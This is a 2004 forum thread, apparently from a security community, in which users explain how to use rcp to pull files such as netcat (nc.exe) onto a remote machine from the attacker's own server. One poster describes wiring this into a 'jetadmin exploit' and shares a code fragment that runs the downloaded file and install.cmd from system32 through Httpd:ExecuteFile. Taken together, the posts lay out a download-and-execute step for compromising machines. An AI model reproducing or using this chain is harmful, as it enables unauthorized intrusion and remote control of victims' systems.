JDog45
Jun 29 2004, 02:06 PM
i'm completly stumped on the correct way to use rcp.. i've tried a lot of times trying to understand it i just can't get it for some reason. Can someone help me out and give an exampe or two? I don't need a full blow tutorial, just some help.
Neo_
Jun 29 2004, 04:21 PM
Somewhere in this section, not so old...
BuzzDee
Jun 29 2004, 04:45 PM
1. set up a rcp server on YOUR pc. search google for qvtnet32.
2. make an account on ur server
3. type on the REMOTE MACHINE rcp -b [your ip].[pass] bla.exe
wait some time and the file is on the remote host. cheers
JDog45
Jun 30 2004, 03:19 AM
to neo: sorry i tried looking and couldn't find anything i must have overlooked it
to buzzdee: thanks i'll check out what you said to do and i'll reply back again if i have any trouble again
edit: well i set it all up and then when i tried it on myself i got this:
C:\>rcp -b 127.0.0.1.w00t nc.exe
The system cannot find the file specified.
Then:
C:\>rcp -b 127.0.0.1.w00t c:\qvtnet\nc.exe
c: Unknown Host
daguilar01
Jun 30 2004, 04:39 AM
i think the proper format is
rcp -b 127.0.0.1.user:filenametoget.exe filenametosaveas.exe
JDog45
Jun 30 2004, 08:45 PM
| QUOTE (daguilar01 @ Jun 30 2004, 04:39 AM) |
i think the proper format is rcp -b 127.0.0.1.user:filenametoget.exe filenametosaveas.exe |
arite i got it to work so far.. next thing.. i integrated it into the jetadmin exploit.. now i need to set the exploit to execute my file once it's done sending.. so am i able to tell RCP to save the file to a specific location? otherwise how would it know where to execute the file? i set it up like this but i'm not sure if it will work
| CODE |
"Httpd:ExecuteFile(c:\\windows\\system32\\".$rcpfile.");". "Httpd:ExecuteFile(c:\\windows\\system32\\install.cmd);". "Httpd:ExecuteFile(c:\\winnt\\system32\\".$rcpfile.");". "Httpd:ExecuteFile(c:\\winnt\\system32\\install.cmd);" |
tstngry
Jun 30 2004, 08:57 PM
This is the topic where i first learned how to use rcp. The guy in the third post explains it perfectly and tells you everything you need to know. That topic is
http://www.governmentsecurity.org/forum/in...t=0entry42461. Hope this helps
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.